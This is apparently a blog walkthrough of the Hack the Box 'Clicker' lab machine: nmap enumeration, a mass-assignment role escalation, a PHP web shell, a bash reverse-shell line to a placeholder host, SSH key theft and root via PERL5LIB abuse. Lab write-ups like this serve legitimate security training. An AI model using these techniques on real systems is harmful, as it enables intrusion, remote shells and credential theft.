In this post, I would like to share a walkthrough of the Clicker Machine from Hack the Box
This room will be considered a Medium machine on Hack the Box
What will you gain from the Clicker machine?
For the user flag, you will need a website featuring a game reminiscent of Universal Paperclips. Through meticulous analysis, I’ll uncover a mass assignment vulnerability, employing innovative techniques such as newline injection and SQL injection to circumvent filters and elevate my role to admin status. Subsequently, I’ll exploit a file write vulnerability to establish a web shell and gain execution privileges on the system. To further advance, I’ll identify a SetUID binary belonging to the next user and exploit it to access their SSH key.
As for the root flag, you need to abuse the bug on the manipulation of Perl environment variables
For those who want to learan or improve CyberSecurity skills especially Red Teaming and Blue Team, You can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me
Academy link can be found https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vvv
Information Gathering on Clicker Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start
┌─[darknite@parrot]─[~/Documents/htb/Clicker]
└──╼ $ nmap -sV -sC 10.10.11.232 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-25 21:32 EDT
Nmap scan report for 10.10.11.232
Host is up (0.16s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 89d7393458a0eaa1dbc13d14ec5d5a92 (ECDSA)
|_ 256 b4da8daf659cbbf071d51350edd81130 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://clicker.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 39593/udp6 mountd
| 100005 1,2,3 40478/udp mountd
| 100005 1,2,3 54941/tcp mountd
| 100005 1,2,3 59945/tcp6 mountd
| 100021 1,3,4 35535/tcp nlockmgr
| 100021 1,3,4 46513/tcp6 nlockmgr
| 100021 1,3,4 50096/udp nlockmgr
| 100021 1,3,4 53836/udp6 nlockmgr
| 100024 1 44540/udp status
| 100024 1 47015/tcp6 status
| 100024 1 51776/udp6 status
| 100024 1 60587/tcp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.14 seconds
┌─[darknite@parrot]─[~/Documents/htb/Clicker]
└──╼ $
Let’s access the website interface
Sadly, nothing is interesting to investigate further unless to register a new account and login using the account that we registered early
Therefore, we should be registering a new account and accessing the website using the account we created which leads to the interface as shown above.
The profile information will look as shown in the screenshot above.
For the play interface, it would appear something like the above.
Let’s analyze the outcome via burpsuite and there’s no odd on the response.
Showmount enumeration on the machine
Therefore, let’s execute the showmount on the clicker.htb which we sighted the /mnt/backups folder
Firstly, we are required to create the folder exactly like that we found using showmount command
As a result, let’s mount the folder into our attacker’s machine
Inside the folder, there’s a zip file which we can further analyze on our attacker’s machine
Let’s copy the file into our attacker’s machine
We should disable the mount function so that it will not affect the machine
Let’s extract the zip file
There are a lot of PHP files which we can investigate further
Analyze the PHP file extension on the machine
After analyzing the PHP source code, we found that we can escalate to the admin role in the website application itself.
We can add a function such as &role/**/=Admin after the level function as it might provide us the administrative access.
At first, it didn’t work which caught me off-guard on the attack technique but it suddenly worked when you re-login the home interface.
The interface should be shown in the screenshot above.
However, there is nothing on the Administrator panel
Therefore, let’s put our PHP simple shell after the role function
After that, we should export the function as a PHP file extension.
Finally, we got a command injection when we tried to run the “id” command
Let’s start our listener on our attacker’s machine
We can execute the reverse shell command which would make the easier to retrieve the shell on our machine.
P/s: We can also use the common bash shell such as bash -i /dev/tcp/<IP>/<PORT> 0>&1 but we are required to URL encode
Enumeration on www-data to user access
Boom! We have successfully retrieved the shell as www-data
I notice there are only 2 users that can use the bash
There are a few files assigned to Jack that we can investigate further.
One of the files contains some instructions on the web application management’s task
However, the binary can be easily read as usual.
Let’s see the extension of the binary
As a result, we should download the binary to our machine.
As shown in the screenshot above, it show that the download is a success.
We also can analyze the binary with the strings command
The outcome shows a MySQL command which we can run on the machine.
I didn’t expect the MySQL command to work but let’s continue with this path before moving forward with a different path.
There are a few databases on the MySQL but clicker have caught my attention compared to other databases.
There are a few players that have been stored in the database but it could be a rabbit hole on the machine.
It look promising when i try to execute the command above.
At last, we managed to retrieve the SSH private key which we can use to obtain access to the machine.
We can try accessing the only user that we found earlier which is jack with the SSH private key and it works.
We can read the user flag by typing the command “cat user.txt”
Escalate to Root Privileges Access
As usual, we can execute the basic command to retrieve some malicious file which in this case, it’s monitor.sh file
From my understanding of the bash source code, we can abuse the PERL5LIB which can be read here
We can use the command shown inside the page here to execute the command injection on the machine.
As shown in the screenshot above, /bin/bash has still not been given the binary permission to escalate to root yet.
Therefore, let’s give the bash file the binary permission so that we can escalate to root
As shown above, the bash file has been given the binary permission which is highlighted in red colour.
Finally, we can escalate to root access.
We can read the root flag by typing the “cat root.txt” command
No responses yet